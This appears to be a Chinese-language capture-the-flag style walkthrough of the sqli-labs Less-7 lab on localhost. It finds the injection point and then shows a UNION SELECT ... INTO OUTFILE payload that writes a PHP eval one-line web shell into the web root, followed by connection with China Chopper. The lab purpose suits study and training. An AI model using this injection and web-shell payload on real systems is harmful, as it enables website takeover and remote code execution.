sqli-labs-less-7 使用outfile函数写入一句话木马

Less-7 一句话木马

判断注入点：

127.0.0.1/sqli-labs-master/Less-7/?id=1 显示正常提示：You are in… Use outfile…
sqli-labs-less-7 使用outfile函数写入一句话木马

127.0.0.1/sqli-labs-master/Less-7/?id=1’ 显示错误，错误信息：You have an error in your SQL syntax
sqli-labs-less-7 使用outfile函数写入一句话木马

。。。。。。
127.0.0.1/sqli-labs-master/Less-7/?id=1’)) 显示错误
127.0.0.1/sqli-labs-master/Less-7/?id=1’))–+ 显示正常，
此题没有回显有效信息，只有正确和错误判断，提示可以使用outfile函数，且没有过多的错误回显，可以考虑使用布尔盲注或者用outfile函数将一句话木马注入，配合中国菜刀侵入网站。

以outfile函数为例：

Sql知识点：

Load_file() 读取本地文件，select load_file(‘文件地址’);
out file 写入文件，select ‘需要写入的内容’ out file ‘需要写入的地址\1.php’;
一句话木马: <?php @eval($_REQUEST[“password”]) ?>

注入木马：

127.0.0.1/sqli-labs-master/Less-7/?id=1’)) union select 1,2,’<?php @eval($_post [“password”]);?>’ into outfile’E:\phpstudy\phpstudy_pro\WWW\1.php’ --+
虽然显示错误，但是木马已经进行注入
sqli-labs-less-7 使用outfile函数写入一句话木马

打开中国菜刀，进行连接

sqli-labs-less-7 使用outfile函数写入一句话木马

这里已经侵入网站。
Less-7结束

sqli-labs-less-7 使用outfile函数写入一句话木马

Less-7 一句话木马

判断注入点：

以outfile函数为例：

Sql知识点：

注入木马：

打开中国菜刀，进行连接

相关推荐